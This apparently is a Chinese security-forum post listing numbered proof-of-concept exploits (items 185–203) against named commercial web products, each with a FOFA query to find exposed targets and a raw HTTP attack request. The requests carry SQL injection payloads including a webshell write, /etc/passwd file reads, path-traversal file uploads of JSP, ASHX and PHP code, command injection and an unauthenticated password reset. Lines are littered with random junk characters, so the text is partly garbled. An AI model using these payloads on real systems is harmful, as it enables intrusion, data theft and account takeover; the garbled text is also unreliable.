User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) D, u+ X, p9 r# B6 g$ s
Accept: application/xml, text/xml, */*; q=0.015 }4 Z" [* l6 U, ]
Content-Type: text/xml; charset=utf-8
/ m& k0 l3 W9 p3 J- n% m" z9 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ e+ z/ }: P! M8 ~
X-Requested-With: XMLHttpRequest
2 {$ m+ f# P* w( K7 ~- b3 |6 U% b; z' C$ x

# _2 J1 q2 H( j* \  v& Ainsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'), E, B7 Y# h! w
% O' [1 |/ V( [% K6 F" h

2 o0 w2 {) T' u/ b0 j" }185. 瑞友天翼应用虚拟化系统SQL注入" L5 e( B# V* F+ U3 \* r
version < 7.0.5.18 Z& F0 O8 `9 V9 J! z
FOFA:app="REALOR-天翼应用虚拟化系统"8 [" g# l! f1 h  {' n9 h2 M9 o
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.18 U0 H) a8 V* {, R: g  ~
Host: host
, G& Z% j( P" X* X/ O4 ?
2 S, d  f3 v: @0 _" ~% V. f' z+ e2 K- v6 c* D; u) l
186. F-logic DataCube3 SQL注入/ L! S: E. W4 m) N7 B
CVE-2024-31750  I$ E+ C3 e# Q3 R$ V3 [
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
5 H8 ]6 [( p4 E7 m8 U& BFOFA:title=="DataCube3"
2 G, x* q1 ~" U1 y$ mPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1$ I9 U3 v& M: _4 m) c) g' z
Host: your-ip5 Y( P0 F8 u+ {+ P) q9 `" p- F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.08 f4 F7 Y  F8 c- V' D1 X2 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
7 j; F) ?0 ^% g5 m) [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: B( I% p! T5 y
Accept-Encoding: gzip, deflate( V5 N! Y1 T! o! _! h; e5 ^3 D+ {3 G4 E& u
Connection: close
0 Z3 l. G6 ~/ tContent-Type: application/x-www-form-urlencoded' I0 j6 a7 ]4 s9 @' a% @

, {4 f* P: t$ H' Y- [8 |req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14501 |$ Y" G: U" z* x& F
5 J0 u1 \0 q$ K& }& A

: S; j  K- l- }; b2 A3 e0 u187. Mura CMS processAsyncObject SQL注入0 S$ {2 j0 e1 }5 f( c. N
CVE-2024-326402 i& g+ j! D$ P( ^( F
FOFA:"Mura CMS"7 Q5 i0 u2 z% T) T* E
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
9 y" [  q! o) Z- L% U; tHost: your-ip
3 L' [6 j; ^5 }5 [$ _4 rContent-Type: application/x-www-form-urlencoded* u9 _: N, x+ F7 v# v

* o4 i! c4 v$ A0 U) |% B" b. ^3 ]1 x4 J
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1- ?; s$ L) J. Y

8 ]( @+ U' l# A1 I/ S
  Q, x- ]$ [  q+ a9 ]/ o7 T. x188. 叁体-佳会视频会议 attachment 任意文件读取# f) Z8 }( c, l; \: J9 l$ z
version <= 3.9.7
9 k; _4 e) b2 z$ ~& sFOFA:body="/system/get_rtc_user_defined_info?site_id"# S2 J, N6 d( M" G, Y
GET /attachment?file=/etc/passwd HTTP/1.1
0 \' y" I2 z6 O) I! HHost: your-ip
4 Y' z5 ]- ^% T+ i& NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 m. T" @* z7 F" fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( s! m4 |$ j8 L/ a( T0 F2 }
Accept-Encoding: gzip, deflate! p, p! O5 C( f: m) D9 s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8. `; ]' w( ^# |5 {$ Y, J& N
Connection: close
# n0 N: T% e2 O- V, P
$ [, t. u( ^) ^, I0 @
1 E  [' }: J- F' a. Z* R189. 蓝网科技临床浏览系统 deleteStudy SQL注入( S9 Z3 \! O/ x. x4 K0 L
FOFA:app="LANWON-临床浏览系统"
' f: U1 \* `, N! @2 e+ H; e7 mGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 H. @) D% m3 _% S% R8 P
Host: your-ip- d0 y/ _2 e- w* a% z( B# K
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- U4 k4 h) Q( v: M" K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 }) A$ l  U# E* LAccept-Encoding: gzip, deflate* Y# o# X( Z% l5 w
Accept-Language: zh-CN,zh;q=0.9) F% S, \) ?5 I* X' X( j5 j
Connection: close! T' H1 R$ _! y; L- a0 g% u% f4 A

( s+ ^* ]- E0 z$ w; w& [9 B( S, d8 h0 {9 I& i9 e! o) z
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
( _3 q- m$ M7 H( j# R4 \FOFA:title=="短视频矩阵营销系统"
9 x* r. g8 v0 C- KPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
& j3 O9 ^" n( i! k: RHost: your-ip
: D+ b# x6 c" B" lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
" Q. |% y8 x, [, V0 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. Q8 T$ y- _0 T+ L- `
Content-Type: application/x-www-form-urlencoded# v+ f8 j& y3 M2 T
Accept-Encoding: gzip, deflate
( g% v/ }3 J& }Accept-Language: zh-CN,zh;q=0.9
7 Y5 L$ `) p+ S. P2 N+ p3 H
. L9 @7 C$ i9 s9 w* _# O9 l$ w5 [poi=file:///etc/passwd
) ?# q$ `6 @2 v3 {( f& M% T% u4 Q! n; o; c2 \$ M
- a" x) w/ q. \
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
% y  V' U' ~& \0 ^7 V* X7 NFOFA:body="/CDGServer3/index.jsp"8 e9 E) @, O* A9 m. M9 {( t, x
POST /CDGServer3/js/../NavigationAjax HTTP/1.1% @* ], T; H7 [6 n7 R* s
Host: your-ip
6 A$ [8 s: l. q' j9 b, {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ^) E9 G! o+ H* O3 D, t) n
Content-Type: application/x-www-form-urlencoded, \* e) A+ r$ G9 m" V8 Q! V* s( D

# C3 }& w' y' ]command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
/ b9 A# O/ }, c; V, ?( {/ h7 q2 L% y; v9 s3 p
2 \/ ~8 H2 v. E* s: j/ G" ]
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 ?7 |5 s' Y! o( R
FOFA:title="用户登录_富通天下外贸ERP"
  y2 E8 H( n  n, e. ], Q/ KPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.17 U3 s! V' M) _  c8 `
Host: your-ip$ o" l0 F4 D+ U& I$ c9 C/ P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- [3 S8 F( x  d" M& N
Content-Type: application/x-www-form-urlencoded' V/ J6 D4 j$ l4 b  I% s
" m  R& z3 q7 o5 j% i1 k1 Z: Z
4 C$ }4 ?4 K5 @6 F
<% @ webhandler language="C#" class="AverageHandler" %>
$ Z/ U! _* V5 a4 Nusing System;
6 w2 w  T- B  t! P9 B, Y' zusing System.Web;; ?4 f6 Z1 m* |3 V& _0 f  z
public class AverageHandler : IHttpHandler
2 U$ F0 v, ^. k1 Z2 T% M{  I2 h1 t2 |3 ~
public bool IsReusable
0 T$ H2 q! x; |! `1 o! R{ get { return true; } }
1 M/ O( P0 p5 Z  C! L8 P6 L* {2 Qpublic void ProcessRequest(HttpContext ctx)
. n6 _. Z! L* m4 H# @1 |% q) E{
( G5 ]- J( v" H5 z- k$ w6 cctx.Response.Write("test");
& P( G  [, A. V7 ]5 o}
; B% e6 H. z' a5 o}
3 V+ s# Y& ^  h; m0 {
' V1 A! S& X: M
% D( P* E) j6 `193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行* \. J+ i) q# j; ~$ j/ c
FOFA:body="山石云鉴主机安全管理系统"
9 a+ K- f3 W2 J! P4 rGET /master/ajaxActions/getTokenAction.php HTTP/1.1
% i% Z: B) K' ~Host:9 {3 t" z+ w8 Q
Cookie: PHPSESSID=2333333333333;
' q( M  t, w: K" U1 Z/ SContent-Type: application/x-www-form-urlencoded
$ S4 _7 M4 U% SUser-Agent: Mozilla/5.0
. r% `0 u" J# |& X4 P& y
" Y! Z" s% K, L3 n( X3 H
, G) a* Z; H  q3 ^$ c2 i% EPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.12 I& [: S: X. E3 n! r4 @  Z# c; {; x
Host:
* F  r' C- ~" P3 t8 a, BUser-Agent: Mozilla/5.0
; s8 O4 i; Q& ~- o" wAccept-Encoding: gzip, deflate
* \; |" c5 }) FAccept: */*2 g" |1 b4 S1 m8 b% q6 \0 }
Connection: close3 x. {# N2 z( G6 o
Cookie: PHPSESSID=2333333333333;
7 }$ u' i/ C/ h/ |Content-Type: application/x-www-form-urlencoded! I0 Y, g# _4 l
Content-Length: 84
3 s$ r( j3 w: w! ^4 D2 a0 J
9 \$ X8 g% U- `$ M% A- h( U8 Jparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')5 Z! L+ K  d0 J8 E( U

  t9 N% u6 H9 n+ S* a/ C* Z. h# @  k8 d7 Z1 ?8 t$ |
GET /master/img/config HTTP/1.1: g) U; d5 o- ^0 a$ ~
Host:+ H1 j" }3 b% ]+ n" f5 N" ~
User-Agent: Mozilla/5.03 M2 E: S7 e; p8 T6 I6 w* V

( U, S( ]9 \  ]$ N) d4 d4 U' Y
/ S$ C, x" u1 A194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
$ p- p2 P0 B/ ^0 o$ j: ^; sFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
" }; q1 M; p, e3 x* p6 Y% G* ~& ~6 U; B4 G
POST /servlet/uploadAttachmentServlet HTTP/1.1
9 s6 ?8 ]- ~6 lHost: host
2 P) M8 X9 H2 U" j' \# |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36# \- x2 n+ h, Z$ y4 P! _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 Q3 D& `1 q8 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 w8 Q6 o# Y( ]4 t1 B
Accept-Encoding: gzip, deflate
' o, D7 s& G' D- x' ~, jConnection: close
3 K6 ]  E3 O9 r1 E( p5 t: ?, qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk9 l# s: B5 |4 `# |4 L
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 V9 R6 ^9 o$ _- W. t/ K
: f. X% G0 i2 V( xContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"0 E5 F9 e; n. G! _# i& k& M
Content-Type: text/plain4 c3 C) f. y8 B9 D
<% out.println("hello");%>
5 h' O/ x- m, T3 M7 v1 r2 e+ t------WebKitFormBoundaryKNt0t4vBe8cX9rZk/ u7 |: B9 i, J* }0 d5 Y- j" K
Content-Disposition: form-data; name="json"
0 H. Z/ w$ n0 i$ ~ {"iq":{"query":{"UpdateType":"mail"}}}$ r4 ?2 [/ h) r7 ]) `4 W8 e
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
7 F& P* \6 B$ A
& B0 p0 C8 W7 a" o1 l4 F3 {7 E' I; m3 l) z
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
7 o( K9 s0 U, Y( w4 ^5 FFOFA:title=="飞鱼星企业级智能上网行为管理系统5 p/ p4 R) ?* D  Y4 E8 ]  k, Z
POST /send_order.cgi?parameter=operation HTTP/1.1
* r: D( [. ^! y; u, WHost: 127.0.0.1
* }; w5 o# {/ _+ D7 B% Y# x, sPragma: no-cache
# H8 J4 T1 K7 ?Cache-Control: no-cache: u% l9 K5 F8 \( L! X9 d) J* D; h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 r8 g7 B, Z, ]Accept: */*
$ m7 l- o0 u0 g+ ?; s$ pAccept-Encoding: gzip, deflate
7 R2 j5 X! p/ AAccept-Language: zh-CN,zh;q=0.9/ x+ w2 o! ~* H- M
Connection: close! `& h. Y2 k& Q4 d
Content-Type: application/x-www-form-urlencoded
, o" N; @2 M/ H7 sContent-Length: 68
% Q7 U# L( X1 I; }( b. K* [/ i1 u& O# N
4 t! x" h  Z: c5 B4 j0 h# |{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
3 O- V( h4 q6 C8 Z) d, q; f9 c% D/ B  \$ J# B7 H# ]2 {

' N" b0 ~1 V( C  q196. 河南省风速科技统一认证平台密码重置% q/ o- O5 X$ Z/ m" [* U; u
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
) n& q" E- s1 ?* x3 lPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
. q# Z; U/ I2 H/ \! FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, V& t7 i7 `5 P% x0 P/ q3 S0 Y* l
Content-Type: application/json;charset=UTF-8) f( ^+ r* b+ m% q1 v  h  N
X-Requested-With: XMLHttpRequest
9 a7 }5 _: E& Q7 o% \Host:3 q! `8 H* A# J- r* i0 ~& t$ l
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.25 G0 T% f( q2 e. Y
Content-Length: 45* |, f( q3 ^2 O) U/ @' Z$ E4 L, A
Connection: close4 x3 ?3 S3 h. u  `/ T7 `; M0 u
" u& A  O# T+ p' g5 k
{"xgh":"test","newPass":"test666","email":""}
, l1 C+ L% b$ ^0 i
& x+ `( v; @+ Q, \
; T  s$ P* u$ B5 H3 L0 R8 ~$ c# M# L
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: j0 j# X/ l- }, KFOFA:app="浙大恩特客户资源管理系统"
7 g% j/ c. w% o, z- H4 e( Z5 w7 _GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1, _6 W, T( ~6 K
Host:& p* r' y" N5 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
7 j0 R; z! ~  i6 t/ N8 T# sAccept-Encoding: gzip, deflate
5 [) f1 y# {9 w% hConnection: close. D6 D" A" c) a! y, E, p. `& }+ A

# i3 U/ u! w2 X5 ?' j6 a/ g% m% D+ J8 b( S# y  _9 |  p( B

( n. J! M7 V$ H1 o9 y9 O! r7 g198.  阿里云盘 WebDAV 命令注入8 |+ f2 R5 I) u3 M& J
CVE-2024-29640
: G" B% q9 q, l3 rGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.17 p' U* g, k) G  f; {5 ~; O
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64# X) A! K1 H. `: Z3 O( g3 D
Accept: */*
& o8 N" z& i3 y. Z$ p5 n$ E3 o% PAccept-Encoding: gzip, deflate# d# Q/ @% O; A; e- k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.65 r, |* S: s9 J+ Y* [1 S+ R' l$ E6 h
Connection: close; P3 O. O6 R. u: d2 _3 g% Z

: u! t/ K; A  z# P! P) ]5 }) `: R* w# J' d! V, s9 e9 `, T
199. cockpit系统assetsmanager_upload接口 文件上传
) n% u3 q/ Y% a% J
0 O+ C" f5 ~+ I0 C4 r" A+ `) O1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
  r) _- i2 s" V% y# ?GET /auth/login?to=/ HTTP/1.1
+ k! q9 ~; i3 A3 ?% M; x8 V/ D/ D3 {4 s0 N* V+ B! d% p5 v+ C& b
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
, |" o) ?) Y7 `' u& H' |1 }( D! \# h; w4 n( W2 w
2.使用刚才上一步获取到的jwt获取cookie:" B/ P- H4 w( ], k* }

- ^4 G$ @! ]! O! E" nPOST /auth/check HTTP/1.10 _4 ?% A# a4 h: x" W3 L/ P
Content-Type: application/json
$ G( a$ K& D( Q2 J/ X2 b- W7 k+ \5 O; {0 R9 M+ M; R
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
0 N* l" r! v( y4 A+ w/ y
5 T1 F8 `1 g  T$ r# d响应:200,返回值:
: n5 ]+ y% q4 \" ]2 MSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
8 ]% T+ w% ]: _: U- Y6 qFofa:title="Authenticate Please!"
8 s# b% \7 R) x$ B8 a( gPOST /assetsmanager/upload HTTP/1.1" l" ?& U' W. g4 l1 Q5 M2 c
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
8 y+ [6 _8 g  BCookie: mysession=95524f01e238bf51bb60d77ede3bea92
. N9 q4 Z: |# o" q& Z# N; E3 z/ S3 W; K2 w7 M# p- f3 ~
-----------------------------36D28FBc36bd6feE7Fb3
+ L1 ^1 N9 g# y; Y& C: UContent-Disposition: form-data; name="files[]"; filename="tttt.php"% ~# I& l( y. Y. e
Content-Type: text/php
" W5 j9 i0 ?  n( z- w( V3 d) I- n3 m0 m+ V6 O: w
<?php echo "tttt";unlink(__FILE__);?>
4 R3 ^+ U* i# N/ r* U# C-----------------------------36D28FBc36bd6feE7Fb3
3 N9 n; U" l/ sContent-Disposition: form-data; name="folder"5 J" ~3 T7 K! B* _

3 @2 K2 O1 `2 d% U  L) s) ^% Z-----------------------------36D28FBc36bd6feE7Fb3--
5 I7 m) Q* p! f: }2 O0 ^$ ^- i; S2 w* |
% w, H0 u( |# u: M+ O1 F; N
/storage/uploads/tttt.php
! _3 G9 T3 F% O  g" c: V4 o% R0 O7 O( c) L+ E! W
200. SeaCMS海洋影视管理系统dmku SQL注入
! I8 ]; O3 W6 s, nFOFA:app="海洋CMS"  v7 r* y. w6 I( u
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
. Y* F" x7 s8 N& g  A3 u8 x) wCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
0 |+ ~. `# `' {Upgrade-Insecure-Requests: 1
0 Y5 M2 m. I; d% }0 c  L9 m/ ~/ tCache-Control: max-age=01 b( A/ b4 V7 E1 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  D3 V- r. g  {% @! t% c0 r
Accept-Encoding: gzip, deflate
2 f. w+ }5 M( d' G: ]" u2 YAccept-Language: zh-CN,zh;q=0.9
8 [3 r- B  ]) @  S' |+ D4 j) V+ X$ Z" m4 R* C0 m% ~: C4 i
% L8 W3 G5 F' W! T2 i, B9 |, g
201. 方正全媒体新闻采编系统 binary SQL注入
! e" m& `4 v3 [* h# \FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"4 E5 \( w4 s6 z# \! G0 z" Y# \+ b* E
POST /newsedit/newsplan/task/binary.do HTTP/1.11 h4 z3 U& C& y
Content-Type: application/x-www-form-urlencoded& W  o8 Q# c- C# K7 @, L  X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: P/ i: U2 w% FAccept-Encoding: gzip, deflate
: x0 k7 W# p! VAccept-Language: zh-CN,zh;q=0.9
# M' `7 A; A8 UConnection: close7 Q: w2 Y* b; ]8 U
6 p" V' N+ u2 @) S! S5 B; h6 v- P
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1' I/ T) `3 U1 M, ^3 ~/ f

1 Z5 Z  ~- h# w/ v- y5 \) i0 e! K  `$ [! k) I. m
202. 微擎系统 AccountEdit任意文件上传
; G4 q+ Q; R  X7 [! _4 \; u0 j4 FFOFA:body="/Widgets/WidgetCollection/"6 V4 o  v7 I3 _  M+ k$ B
获取__VIEWSTATE和__EVENTVALIDATION值4 _0 t* Y7 g; {, ~7 R
GET /User/AccountEdit.aspx HTTP/1.1
5 y  L) e) _! x& f: eHost: 滑板人之家% f8 ~- _) S$ W9 a1 m+ G6 u$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31, a6 |9 p# g" J  ^, V. }
Content-Length: 0$ _0 I) w, ~% k; T: u. X2 [% E

4 e6 X% U( i, p0 l/ X; Z, i: z; a# X( X9 ]) V
替换__VIEWSTATE和__EVENTVALIDATION值
5 _  [% x# b. r$ iPOST /User/AccountEdit.aspx HTTP/1.1" T/ r% n1 x# k6 ^
Accept-Encoding: gzip, deflate, br
; F+ n0 N4 v- w6 P) Y/ VContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687: @/ O; D# U2 f2 K. A

* d- q  d2 f7 a" s-----------------------------786435874t38587593865736587346567358735687
& K8 ~8 e" ~9 J4 X0 zContent-Disposition: form-data; name="__VIEWSTATE"8 r. G5 L, m, v

$ [" ]" o# h7 v4 U) N__VIEWSTATE
6 B' R/ J9 I* e( E" K-----------------------------786435874t385875938657365873465673587356876 v( x& s9 ?1 Z" j) v
Content-Disposition: form-data; name="__EVENTVALIDATION"$ R7 R2 A% {& `% k) W
' E, Z, H7 [0 a) R+ F1 c) D; H: y& T
__EVENTVALIDATION
/ V$ v. ^( P# X$ [-----------------------------786435874t38587593865736587346567358735687! A5 Y' d$ k4 i2 m% U; S$ A
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"7 j2 W' z7 Z$ u, x
Content-Type: text/plain
! G' a/ {: |. d: d* p
5 ], O4 M- s( S$ cHello World!# L# m9 a! h0 w/ E8 [" B
-----------------------------786435874t38587593865736587346567358735687
( k9 ]! Q! A& i; ^Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"5 R3 L+ ?, O1 a! ?7 M* r

0 \- L$ s4 x5 W9 Q9 C- E9 x# k上传图片* @6 F& K, M6 l* R8 C3 J$ U' v
-----------------------------786435874t38587593865736587346567358735687
4 P. D4 g6 Y( D" ^4 ^. s% P8 jContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName". F( s$ d% {' ?2 N1 P0 C8 `  f% f
9 M6 E8 @! P# I$ B% c
. q6 i+ J" M$ q$ z5 ~7 x9 \
-----------------------------786435874t38587593865736587346567358735687
* c7 s2 B: j, h! M: N( G4 FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"0 r% ~( j/ Q' E% h1 ]  L8 u* w; o

8 ~* K% u9 H. d! n  }  H- S
2 S* B0 b* y# f0 ]-----------------------------786435874t38587593865736587346567358735687--
% Q* D% t! R7 g3 M- X  }- B8 d. J5 e8 Y: ?. M" o7 D) q

: |# @$ p0 a# ?9 B; @  u' b4 v5 H4 ]/_data/Uploads/1123.txt
" s+ P3 L5 c$ l, ]9 }3 y5 G$ [
  u5 G" l/ k) ^. F/ p0 c4 \203. 红海云EHR PtFjk 文件上传
1 F/ p2 Z- f& DFOFA:body="RedseaPlatform"
$ A8 ?+ G8 x0 }! A# x( b  S, jPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1+ }; [+ W0 \" T  S( z" [
Host: x.x.x.x
4 z7 c" O1 S/ J$ |/ v+ P* ~Accept-Encoding: gzip
" a* R, G/ W0 @  xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 z' I  J& d8 zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
2 a4 \4 @" f2 @! uContent-Length: 210
: L3 t5 V) M2 |
4 n; l/ T  v0 r------WebKitFormBoundaryt7WbDl1tXogoZys48 |; I6 d, I( t
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"0 J: a' }# s: \# [( A
Content-Type:image/jpeg
# Y( U: l' P8 ]) t3 u/ S: w7 ?$ _1 p  |5 T2 k7 ^8 N. I
<% out.print("hello,eHR");%>
8 A$ U/ v5 L: k2 t6 U* R------WebKitFormBoundaryt7WbDl1tXogoZys4--
' y9 H1 O9 W( @1 n
1 [8 i! W' d, g, h9 P' r # z8 o+ A" ]7 h2 Q) X

6 {: f, x* c% ?- @' [# E! c5 u( e; h/ W6 `/ s2 }* L5 I, m9 n1 P
& t" F) i$ T/ p( M# G

' m2 O" a$ R# u) S



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2